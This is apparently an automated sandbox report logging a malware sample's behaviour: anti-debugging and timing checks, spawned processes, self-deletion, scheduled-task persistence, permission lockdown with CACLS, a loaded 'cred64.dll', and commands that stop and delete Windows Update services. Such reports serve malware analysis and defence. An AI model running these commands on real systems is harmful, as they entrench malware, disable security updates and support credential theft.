Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF6768E9972 second address: 00007FF6768E99A1 instructions: 0x00000000 rdtsc 0x00000002 inc eax 0x00000003 rcr dh, FFFFFFDEh 0x00000006 pop esi 0x00000007 dec ecx 0x00000008 shl edi, cl 0x0000000a dec eax 0x0000000b cdq 0x0000000c pop ecx 0x0000000d dec ebp 0x0000000e movzx ecx, di 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 inc dx 0x00000018 inc ecx 0x00000019 pop edx 0x0000001a dec eax 0x0000001b cwde 0x0000001c ror ebx, cl 0x0000001e pop ebp 0x0000001f adc al, DDh 0x00000021 popfd 0x00000022 bswap dx 0x00000025 inc esp 0x00000026 movsx esi, bp 0x00000029 inc ecx 0x0000002a pop eax 0x0000002b inc ecx 0x0000002c sete ah 0x0000002f rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF675F42B33 second address: 00007FF675F42B4C instructions: 0x00000000 rdtsc 0x00000002 movzx edi, sp 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 not dx 0x0000000a inc ecx 0x0000000b pop ebp 0x0000000c inc ecx 0x0000000d pop esi 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 dec eax 0x00000011 movsx eax, sp 0x00000014 pop edi 0x00000015 dec ecx 0x00000016 movzx ebx, cx 0x00000019 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF675F9FC76 second address: 00007FF675F9FC96 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc |
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000106587EA second address: 0000000010658809 instructions: 0x00000000 rdtsc 0x00000002 ror cl, 1 0x00000004 ror edx, FFFFFF86h 0x00000007 xor ax, si 0x0000000a not cl 0x0000000c clc 0x0000000d xor bl, cl 0x0000000f push esi 0x00000010 push edi 0x00000011 rol dh, FFFFFF9Dh 0x00000014 rcl eax, cl 0x00000016 test bx, bx 0x00000019 push ebx 0x0000001a mov ebx, ecx 0x0000001c movsx eax, di 0x0000001f rdtsc |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process queried: DebugPort |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process queried: DebugObjectHandle |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugPort |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugObjectHandle |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugObjectHandle |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugObjectHandle |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugPort |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugPort |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process queried: DebugPort |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe" |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit |
Source: C:\ProgramData\61312899942613011832.exe | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: unknown unknown |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E1307A sqlite3_transfer_bindings, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D5E6 sqlite3_bind_int64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D595 sqlite3_bind_double, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E0B431 sqlite3_clear_bindings, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E037F3 sqlite3_value_frombind, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D714 sqlite3_bind_zeroblob, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D68C sqlite3_bind_pointer, |
